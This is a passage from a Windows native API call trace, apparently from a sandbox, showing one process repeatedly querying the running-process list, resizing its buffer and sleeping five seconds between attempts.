ResultLength=0x0) returned 0x0 [0250.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.996] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.007] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.033] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.076] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.094] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.105] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.114] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.126] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.136] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.145] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.154] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.163] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.205] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.213] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.238] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.245] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.247] NtAllocateVirtualMemory (in: 